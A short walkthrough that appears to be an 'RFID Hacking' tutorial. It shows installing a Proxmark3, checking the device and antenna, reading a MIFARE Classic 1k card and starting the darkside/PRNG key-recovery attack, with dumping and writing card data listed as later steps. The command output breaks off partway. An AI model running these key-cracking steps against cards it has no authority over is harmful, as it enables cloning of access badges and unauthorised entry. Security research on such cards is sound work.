RFID Hacking
Prepare
- Install Proxmark3
- Check Proxmark3 / card status
Crack Keys
- PRNG Attack
- NESTED Attack
- Dump data & Write data
Prepare
Install Proxmark3
$ sudo apt-get install git build-essential libreadline5 libreadline-dev gcc-arm-none-eabi libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config
$ git clone https://github.com/Proxmark/proxmark3.git
$ cd proxmark3
$ make clean && make
Check Proxmark3 / card status
Show version information about the connected Proxmark.
proxmark3> hw version
[[[ Cached information ]]]
Prox/RFID mark3 RFID instrument
uC: AT91SAM7S256 Rev C
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes. Used: 0 bytes ( 0%). Free: 262144 bytes (100%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hw tune
Measuring antenna characteristics, please wait........
# LF antenna: 30.39 V @ 125.00 kHz
# LF antenna: 32.45 V @ 134.00 kHz
# LF optimal: 37.40 V @ 129.03 kHz
# HF antenna: 18.54 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
Crack Keys
Act like an ISO14443 Type A reader
proxmark3> hf 14a reader
UID : f3 34 9b ce
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
Read parity error messages. The next step is to extract at least one valid sector key (A or B ). The implementation of the darkside attack in this firmware version of the proxmark only takes about 9 seconds to complete. In this case the key that was found is one of the default keys but that does not affect the speed of the attack.
PRNG Attack
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press button on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
Parity is all zero. Most likely this card sends NACK on every failed authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can'